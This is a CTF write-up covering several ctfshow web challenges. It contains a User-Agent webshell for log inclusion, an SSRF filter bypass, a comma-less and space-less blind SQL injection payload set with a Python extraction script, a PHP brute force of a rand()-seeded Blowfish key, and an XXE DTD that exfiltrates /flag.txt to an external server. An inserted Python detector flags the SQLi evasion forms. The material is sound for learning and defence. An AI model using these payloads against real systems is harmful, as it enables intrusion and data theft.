Foreword: I hope I can gradually change day by day
Sign in_guanji
First I tried the data pseudo-protocol and found it was banned. After thinking about it for a long time, I forgot about log inclusion: file=/var/log/nginx/access.log
Try putting a one-line webshell in the UA
Wuhu, take off!
system("ls /");
End
web1_view word
Code audit. The challenge means we want to curl http://192.168.7.68/flag and read the flag from the echoed output, but . is filtered. Then I thought of converting the IP to a number, which is equivalent: 192.168.1.100 becomes 3232237668 (decimal address instead of dotted IP address), but this challenge also filters 0, damn it. Finally I saw in the masters' writeups that 。 can be used instead.
<?php
#flag in http://192.168.7.68/flag
if(isset($_GET['url'])){
$url = $_GET['url'];
$protocol = substr($url, 0,7);
if($protocol!='http://'){
die('仅限http协议访问');
}
if(preg_match('/\.|\;|\||\<|\>|\*|\%|\^|\(|\)|\#|\@|\!|\`|\~|\+|\'|\"|\.|\,|\?|\[|\]|\{|\}|\!|\&|\$|0/', $url)){
die('仅限域名地址访问');
}
system('curl '.$url);
}
Finally got the flag
web2_gazing
You can see at a glance that it is SQL injection (sql注入). After fuzzing, I found a bunch of disabled functions. The regular SQL blind injection payload is roughly
1^if(1=1,1,0)
but we can't use it now.
Spaces are filtered and can be replaced by parentheses;
single quotes are filtered and can be replaced by hexadecimal;
the comma is filtered, so for substr you can use substr(database() from 1 for 1) instead of substr(database(),1,1);
if is filtered, you can use case when instead;
ascii is filtered, you can use ord instead;
after filtering the equal sign and like, you can use regexp instead.
So the regular statement above can be transformed into
id=1^case(ord(substr(database()from(1)for(1))))when(102)then(2)else(3)end
import requests
import time

# Boolean-blind oracle: the page contains "By Rudyard Kipling" only when the injected expression is true
url = "http://0d7d7067-4ff7-4557-a713-af5bd4d3ed35.chall.ctf.show/index.php?id=0^"
flag = ""
for i in range(1, 50):          # character position
    for j in range(38, 126):    # candidate ASCII code
        # Earlier stages (database name, table names, column names), kept from the original script
        # payload="case(ord(substr(database()from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
        # payload="case(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)regexp(database()))from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
        # payload="case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from({0})for(1))))when({1})then(1)else(2)end".format(i,j)
        payload = "case(ord(substr((select(group_concat(flag))from(flag))from({0})for(1))))when({1})then(1)else(2)end".format(i, j)
        u = url + payload
        r = requests.get(u)
        time.sleep(0.3)
        if "By Rudyard Kipling" in r.text:
            flag += chr(j)
            print(flag)
            break
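From the defender's side, the substitutions listed above are themselves a signature: no spaces, case/when instead of if, ord over substr, the comma-less from/for form, and regexp with a hex literal. The following Python is an added example (not part of the original writeup) that flags those forms in web server access logs and also spots the per-character oracle loop, where one client repeats the same request shape with only the numbers changing; the log lines are constructed samples and the rule names are my own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed combined-format access log lines (not from the original post); 10.0.0.9 runs the oracle loop.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2020:10:00:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [12/Oct/2020:10:00:02 +0000] "GET /index.php?id=0^case(ord(substr(database()from(1)for(1))))when(102)then(1)else(2)end HTTP/1.1" 200 512
10.0.0.9 - - [12/Oct/2020:10:00:02 +0000] "GET /index.php?id=0^case(ord(substr(database()from(1)for(1))))when(103)then(1)else(2)end HTTP/1.1" 200 512
10.0.0.9 - - [12/Oct/2020:10:00:03 +0000] "GET /index.php?id=0^case(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)regexp(0x666c6167))from(1)for(1))))when(102)then(1)else(2)end HTTP/1.1" 200 512
10.0.0.5 - - [12/Oct/2020:10:00:04 +0000] "GET /index.php?id=2 HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Each rule names one of the filter-evasion tricks the writeup lists.
RULES = {
    "case_when_no_spaces": re.compile(r"\bcase\(.*\)when\(", re.I),          # case(...)when(...) replacing if()
    "substr_from_for":     re.compile(r"\bfrom\(\d+\)for\(\d+\)", re.I),     # comma-less substr form
    "ord_over_substr":     re.compile(r"\bord\(substr\(", re.I),             # ord() replacing ascii()
    "regexp_hex_literal":  re.compile(r"\bregexp\(0x[0-9a-f]+\)", re.I),    # regexp + hex instead of = 'str'
}

def match_rules(query):
    """Return the names of evasion rules matched by a (possibly URL-encoded) query string."""
    q = unquote(query)
    return sorted(name for name, rx in RULES.items() if rx.search(q))

def probe_shape(target):
    """Collapse digit runs so that an oracle loop (when(102), when(103), ...) shares one shape."""
    return re.sub(r"\d+", "#", unquote(target))

def analyze(log_text):
    """Per client IP: flagged request count, rule names seen, and how often one probe shape repeated."""
    flagged, rules, shapes = defaultdict(int), defaultdict(set), defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        hits = match_rules(m.group(2).partition("?")[2]) if m else []
        if not hits:
            continue
        ip = m.group(1)
        flagged[ip] += 1
        rules[ip].update(hits)
        shapes[ip][probe_shape(m.group(2))] += 1
    return {ip: {"flagged": flagged[ip], "rules": sorted(rules[ip]),
                 "max_probe_repeats": max(shapes[ip].values())} for ip in flagged}
```

A high max_probe_repeats from one client is the boolean-blind loop itself, independent of which keywords the attacker substituted.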
web3_view picture
First check the source code; I found this. Base64-decoding it gave a bunch of garbled bytes.
After removing the image parameter, the source code appears. As the official PHP documentation says, brute force is feasible:
Note: On some platforms (such as Windows) getrandmax() is only 32767. If the required range is greater than 32767, then specify the min and max parameters to generate a larger number, or consider using mt_rand() instead.
The brute force finally yields 27347
<?php
/*author
Y4tacker
*/
// rand() on the target tops out at 32767, so the key space is small enough to try every candidate
for($i=0;$i<32768;$i++){
    $key = substr(md5('ctfshow'.$i),3,8);
    $image="Z6Ilu83MIDw=";
    $str = openssl_decrypt($image, 'bf-ecb', $key);
    if(strpos($str,"jpg") or strpos($str,"png") or strpos($str,"gif")){
        print($i);
        break;
    }
}
Next, use that key to generate the ciphertext for config.php
<?php
/*author
Y4tacker
*/
$rand=27347;
$key = substr(md5('ctfshow'.$rand),3,8);   // same key derivation as the challenge
$image="config.php";
$str = openssl_encrypt($image, 'bf-ecb', $key);
echo $str;
End
web4_view heart
I also poked at it a bit first. Damn, it really is like this; I guessed it. Next, we check the page source and get a hint <!-- flag in filesystem /flag.txt -->. To be honest, I was stumped. Then I went to look at the WP and saw XXE, and understood in seconds; of course, without reading the rest of the WP, I went down on my own to my VPS and did some thinking. What we use here is stealing files through a DTD (通过DTD窃取文件).
First an xml file:
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://test.y4tacker.top/evil.dtd">
Next, evil.dtd:
<!ENTITY % p1 SYSTEM "php://filter/read=convert-base64.encode/resource=/flag.txt">
<!ENTITY % p2 "<!ENTITY xxe SYSTEM 'http://我服务器的ip:7999/?pass=%p1;'>">
%p2;
After that, I turned on monitoring on another server of mine.
Ah, this: the hasty monitoring was useless, I don't know why; anyway, the page reported an error containing the flag, but I guess it should be due to the internal network environment.
Reference articles
SSRF bypass method summary
XXE vulnerability exploitation techniques: from XML to remote code execution